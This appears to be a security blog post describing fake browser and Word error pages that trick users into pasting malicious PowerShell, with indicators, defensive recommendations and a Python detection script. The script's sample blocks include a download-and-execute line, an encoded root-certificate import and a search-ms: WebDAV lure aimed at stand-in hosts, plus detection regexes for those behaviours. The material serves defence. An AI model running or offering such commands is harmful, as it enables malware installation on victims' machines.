Warning of a New Attack Method Impersonating Google Chrome to Launch Malicious PowerShell

Security researchers have discovered a new attack campaign in which attackers use fake error messages impersonating Google Chrome, Microsoft Word, and OneDrive to trick users into copying and running malicious PowerShell scripts themselves.

Attack Method

Attackers compromise websites and inject an overlay that displays fake error messages. The messages instruct victims to copy a PowerShell script and paste it into a Windows PowerShell window opened with administrative privileges. No browser or operating system vulnerability is exploited: the victim performs the execution, which is why the technique sidesteps the download and script-blocking protections built into the browser.

Security experts have identified three distinct attack types:

  • ClearFake Campaign: Victims visit compromised websites that load malicious scripts stored on the blockchain via Binance Smart Chain contracts. The script inspects the victim's device and displays a fake Google Chrome warning prompting the user to "install a root certificate" by running a PowerShell script. When executed, the script flushes the DNS cache, clears the clipboard contents, displays decoy messages, and downloads additional payloads, including information-stealing malware.

    Figure 1. Fake Google Chrome notification tricks victims into pasting malicious scripts

  • ClickFix Campaign: Attackers abuse iframe embedding on compromised websites to overlay fake Google Chrome error messages. Victims are instructed to open Windows PowerShell as administrator and paste the supplied script, which leads to infection with various malware families, including DarkGate, Matanbuchus, ...

  • Email-based Infection Chain: Attackers send HTML attachments that resemble Microsoft Word documents. The page prompts the user to install a "Word Online" extension or shows an error message offering "How to fix" and "Auto-fix" options. "How to fix" copies a Base64-encoded PowerShell command to the clipboard and tells the user to paste it into PowerShell. "Auto-fix" uses the search-ms: protocol handler to open an Explorer search view that shows a fix.msi or fix.vbs file hosted on an attacker-controlled WebDAV share.

Figure 2. HTML page impersonating Microsoft Word to trick victims into pasting malicious scripts

Signs of Attack

The following indicators can be used to detect this attack campaign:

  • Malicious domains and websites hosting fake error messages and PowerShell scripts.

  • Malicious URLs related to downloading payloads.

  • Fake error messages instructing users to run PowerShell commands that modify system settings, download malware, or install certificates.

  • Malicious payloads such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, clipboard hijackers, Lumma Stealer.

  • Artifacts such as HTML attachments in spam emails, Base64-encoded PowerShell commands, and malicious MSI and VBS files.
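As an added illustration of the infection chains and the indicators listed above (this is example code, not from the original post or from FPT Threat Intelligence), the Python script below scores PowerShell script-block text for the behaviours these campaigns share: DNS cache flushing, clipboard wiping, root certificate installation, download-and-execute, Base64-encoded commands, and search-ms:/WebDAV lures. The sample script blocks are constructed, and the cmdlet names and regular expressions are assumptions about how those behaviours appear in logs; the post does not quote the actual scripts.

```python
# Added example (not code from the original post or from FPT Threat Intelligence):
# score PowerShell script-block text for the behaviours the "fake fix" campaigns
# show.  The sample blocks are constructed; the cmdlet/regex patterns are
# assumptions about how those behaviours appear in logs.
import base64
import re

# Behaviour label -> regex over lowercased text.  Assumed forms, not quoted from the campaigns.
INDICATORS = {
    "dns_cache_flush": r"clear-dnsclientcache|ipconfig\s+/flushdns",
    "clipboard_wipe": r"set-clipboard|\|\s*clip(\.exe)?\b",
    "root_cert_install": r"import-certificate|certutil(\.exe)?\s.*-addstore\s+\S*root",
    "remote_download": r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\s",
    "dynamic_execution": r"\b(iex|invoke-expression)\b",
    "webdav_search_ms": r"search-ms:|\\\\[^\s]+@ssl|davwwwroot",
}

# -EncodedCommand (and its -e/-ec/-enc aliases) carries a Base64-encoded UTF-16LE script.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text):
    """Decode every -EncodedCommand payload in text; skip blobs that are not valid Base64/UTF-16LE."""
    decoded = []
    for m in ENCODED_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def score_script_block(text):
    """Return (score, sorted labels) for one script block.

    The raw Base64 blob is stripped before matching so that letter runs inside it
    cannot fire short patterns such as 'iwr'; the decoded script is matched instead.
    """
    decoded = decode_encoded_commands(text)
    views = [ENCODED_RE.sub("", text)] + decoded
    hits = {"encoded_command"} if decoded else set()
    for view in views:
        low = view.lower()
        hits.update(label for label, pat in INDICATORS.items() if re.search(pat, low))
    return len(hits), sorted(hits)


def flag_alerts(script_blocks, threshold=2):
    """Indices of blocks whose indicator count reaches threshold (a single hit alone is too noisy)."""
    return [i for i, block in enumerate(script_blocks) if score_script_block(block)[0] >= threshold]


# Constructed sample script blocks, shaped like Event ID 4104 ScriptBlockText entries.
_CERT_CMD = r"Import-Certificate -FilePath $env:TEMP\fix.cer -CertStoreLocation Cert:\LocalMachine\Root"
SAMPLE_ENCODED = base64.b64encode(_CERT_CMD.encode("utf-16-le")).decode()
SAMPLE_BLOCKS = [
    # ClearFake-style paste: flush DNS, clear the clipboard, download and run a second stage
    "Clear-DnsClientCache; Set-Clipboard -Value ' '; "
    "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/fix.txt')",
    # Email chain "How to fix": encoded command that installs a root certificate
    f"powershell.exe -ep bypass -enc {SAMPLE_ENCODED}",
    # Benign administration, for contrast
    "Get-Process | Where-Object CPU -gt 100 | Sort-Object CPU -Descending",
    # Email chain "Auto-fix": search-ms: pointing Explorer at a WebDAV share
    r'Start-Process "search-ms:query=fix&crumb=location:\\attacker.invalid@ssl\DavWWWRoot\share"',
]

if __name__ == "__main__":
    for i, block in enumerate(SAMPLE_BLOCKS):
        print(i, score_script_block(block))
    print("alert on blocks:", flag_alerts(SAMPLE_BLOCKS))
```

To run this against real data, enable PowerShell Script Block Logging and feed in the ScriptBlockText field of Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log. Because these campaigns depend on the user pasting into an elevated console, a script block that arrives a few seconds after a browser or Outlook process spawned PowerShell is a stronger signal than any single pattern on its own.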

Recommendations

FPT Threat Intelligence recommends organizations and individuals take several measures to prevent this attack campaign:

  • User Awareness Training: Emphasize the dangers of executing PowerShell commands from untrusted sources, especially the risks associated with downloading and running scripts from fake error messages.

  • Implement Email Security Solutions: Deploy email filtering features to detect and block malicious attachments and links.

  • Secure Browsers and Systems: Enable security features in browsers to block malicious scripts and overlays.

  • Deploy Endpoint Protection Solutions: Use endpoint protection that detects and blocks malicious PowerShell activity, and enable PowerShell Script Block Logging so that encoded or clipboard-pasted commands are recorded and can be alerted on.

  • Use Cybersecurity Services: Monitor network traffic to detect signs of unusual activity, such as strange PowerShell executions or connections to malicious domains. Use firewalls and intrusion detection systems to identify and prevent suspicious behavior.

  • Patch Updates: Keep operating systems, browsers, antivirus, and anti-malware software patched and up to date. This campaign does not rely on a software vulnerability, so patching limits the follow-on payloads rather than the initial lure.

Written by

Tran Hoang Phong

Just a SOC Analyst ^^